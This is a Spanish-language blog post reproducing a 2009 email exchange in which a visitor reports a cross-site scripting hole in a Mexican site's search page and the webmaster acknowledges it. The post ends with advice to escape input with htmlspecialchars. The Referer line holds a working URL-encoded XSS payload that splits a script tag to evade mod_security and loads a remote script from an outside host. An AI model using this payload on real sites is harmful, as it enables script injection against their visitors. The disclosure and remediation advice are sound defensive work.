Asunto: Re: Formulario de Contacto
Remitente: contacto
Destinatario: soporte@topmetroflog.site40.net
Fecha: 30.04.2009 14:05
Para proteger su privacidad, las imágenes externas han sido bloqueadas en este mensaje Mostrar imágenes
webmaster@chili.com.mx escribió:
Nombre: Soporte
EMAIL: soporte@topmetroflog.site40.net
Comentario: validen correctamente la busqueda porque es vulnerable a un ataque tipo xss.
Referer: http://www.chili.com.mx/search.php?q=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&_b=Buscar
Gracias por el aviso, pense que por tener mod_security configurado con
muchas reglas estaba cubierto, pero se ve que no. Voy a ver como lo
arreglo.
--
*----------------------------*
* Gerardo Perosio *
* contacto en chili *
* contacto@chili.com.mx *
*----------------------------*
Hay que validar correctamente la entrada de la variable q del archivo search.php que mediante GET recibe los parámetros de búsqueda, una solución parcial para search.php?q= podría ser
- Utilizar datos de codificación para evitar la inyección directa de caracteres potencialmente maliciosos (por ejemplo, véase la función htmlspecialchars [inglés] en PHP);
O hacer una función de validación propia.
Saludos,
Suscribirse a:
Comentarios de la entrada (Atom)
Páginas
Etiquetas
INTERNET
(459)
newsweek
(305)
SEGURIDAD
(224)
software
(136)
HACK
(86)
GOOGLE
(47)
Hacker
(46)
Geek
(41)
hardware
(36)
WINDOWS
(34)
Hackers
(31)
CRACK
(29)
facebook
(29)
video
(28)
DESCARGA
(27)
videos
(26)
Celulares
(25)
MICROSOFT
(22)
Informatica
(21)
apple
(19)
GRATIS
(18)
technology
(18)
virus
(18)
exploit
(17)
computación
(16)
informatico
(16)
web
(15)
cracker
(14)
INALAMBRICO
(13)
WINDOWS 7
(13)
noticias
(11)
MSN
(10)
termino
(10)
ACTUALIZACION
(9)
Gamer
(9)
LapTops
(9)
Mac
(9)
PASSWORD
(9)
WINDOWS XP
(9)
dns
(9)
firefox
(9)
juegos
(9)
FOTOS
(8)
cientifico
(8)
iphone
(8)
WEP
(7)
antivirus
(7)
bibliografia
(7)
Desencriptar
(6)
INFINITUM
(6)
wifi
(6)
youtube
(6)
Craker
(5)
Culiacan
(5)
DESMOSTRACION
(5)
TELEFONIA
(5)
gmail
(5)
messenger
(5)
DIRECTA
(4)
DOWNLOAD
(4)
ESPAÑOL
(4)
XBOX
(4)
xss
(4)
Glosario
(3)
HTML
(3)
WPA
(3)
anuncios
(3)
ataques
(3)
hosting
(3)
hotmail
(3)
Guru
(2)
ajax
(2)
wpa2
(2)
No hay comentarios.:
Publicar un comentario
Déjanos tu comentario, nos permitirá mejorar.
¿Qué opinas de este tema?
¿Tienes alguna duda o sugerencia?
¿Te parece adecuado y completo este tema?
¿Falta información? ¿Cual?